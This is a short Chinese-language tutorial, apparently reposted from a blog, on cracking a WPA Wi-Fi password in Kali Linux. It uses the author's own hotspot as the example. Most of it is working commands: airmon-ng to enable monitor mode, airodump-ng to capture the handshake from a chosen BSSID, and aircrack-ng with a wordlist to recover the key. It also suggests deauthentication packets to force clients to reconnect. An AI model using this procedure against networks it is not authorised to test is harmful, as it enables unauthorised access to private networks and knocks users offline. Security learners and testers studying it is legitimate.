kali下的滲透無線wifi實驗


實驗器材

1.kali linux 操作系統

2.VM 虛擬機

3.附近是否有wifi(這里以自己建立的wifi熱點apt 為例)

4.無線網卡rl8187

 

 

操作步驟

1.開始之前的步驟

一般情況下kali linux 操作系統都自帶了airmon應用  沒有的話 使用自帶的軟件源下載

apt-get update

apt-get install airmon*

 

 

2.檢查無線網卡狀態

首先airmon-ng 

檢查無線網卡是否接入虛擬機

 

 

輸入如下:

3.運行無線網卡

airmon-ng start wlan0mon 開始運行無線網卡

 

 

4.掃描周圍所有的wifi信號

 

輸出如下

 

airodump-ng wlan0mon

 

5.掃描,找到可接入的wifi熱點(一般選擇有date變化的 表示該熱點正在使用流量 這樣就可以更加迅速的獲得握手包.cap)

這里以自己的wifi為例

輸出如下(打開一個新的終端)

airodump-ng -w /1/ -c 6 -bssid B0:E2:35:25:B9:DF wlan0mon

這里要說一下

-w 后面接保存的位置  

 

-c 后面接信號道CH  

 

--bssid后面接指定MAC地址

輸出如下

 

 

 

 

解釋一下重要的英文

PWR信號強度

data數據流動

enc無限wifi信號道

 

 

然后等待獲取握手包 也就是.cap文件

保存在-w 后面指定的目錄里

 

當然 如果等不及的話可以

使用aireplay 發送反認證包

迫使對方重新鏈接  快捷的獲得握手包

這里已經獲得握手包名字為3.cap

 

 

6.使用字典暴力破解(把.cap文件放到Home里面 系統默認在Home里)

成功率取決於字典的強度 以及電腦的配置

理論上配置越高跑包的效率越高越能在短時間內獲得需要的密碼

這里輸入

aircrack-ng -a2 -b B0:E2:35:25:B9:DF -w /1/pass.txt 3.cap 

 

 

 

 

最后得到密碼

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM